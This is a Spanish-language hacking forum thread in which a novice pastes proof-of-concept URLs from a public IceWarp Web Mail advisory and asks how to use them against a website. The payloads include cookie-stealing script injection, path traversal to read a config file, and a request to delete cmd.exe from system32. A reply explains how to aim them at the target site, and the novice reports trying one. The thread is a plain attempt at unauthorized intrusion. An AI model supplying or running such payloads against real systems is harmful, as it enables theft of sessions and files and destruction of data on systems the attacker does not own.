Duda con Un Exploit

Bueno amigos miren le pase el SSS a una Web y encontro 2 vulnerabilidades (en Audits) luego fui a Bugtraq ID y el numero que tenia era el 12396 fui a la Web para ver el explits y me salio esto...:

IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities

The following examples are available:

Código:

http:// www.example.com:32000/mail/accountsettings.html->Add->”Account name”,”Incoming mail server”,”User name” = <script>alert(document.cookie) </script>
http:// www.example.com:32000/mail/search.html->”Search string” = <script> alert(document.cookie) </script>
http://www.example.com:32000/mail/viewaction.html?Move_x=1&user=../../hacker
http://www.example.com:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32
http://www.example.com:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
http://www.example.com:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox
http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]
http://www.example.com:32000/mail/folders.html?id=[sessionid]&folderold=....//....//....//….//….//winnt&folder=....//....//....//….//….//linux&Save_x=1

Quisiera saber si ese es el exploits que tengo que compilar.... Huh

Disculpen por la pregunta pero es q Soy un Novato en esto... Grin

Espero que me respondan plzz jejje

Nos Vemos... Wink

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Renders

||
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Brushes

||
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Deluxe Pack

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Mi Blog [ Zona - Brian ]

No son exploits.... es decir, no es un codigo que podes compilar, lo que tenes que hacer es reemplazar el ejemplo por
la web que queres atacar entonces quizas te de privilegios o algun rfi para poder editar la web.

Pr0gr4mer

Gracias por responder Pr0gr4mer....pero cambie el example por la Web que quiero atacar pero me dice esto...

HTTP/1.1 404 Object Not Found

no se si lo hice bien pero puse esto...:

Código:

http://www.webparaatacar.com/:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail

Bueno eso....espero me respondan plzzz

Nos Vemos... Wink

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Renders

||
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Brushes

||
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Deluxe Pack

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Mi Blog [ Zona - Brian ]

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Julio 26, 2008, 03:43:21 Boton Buscar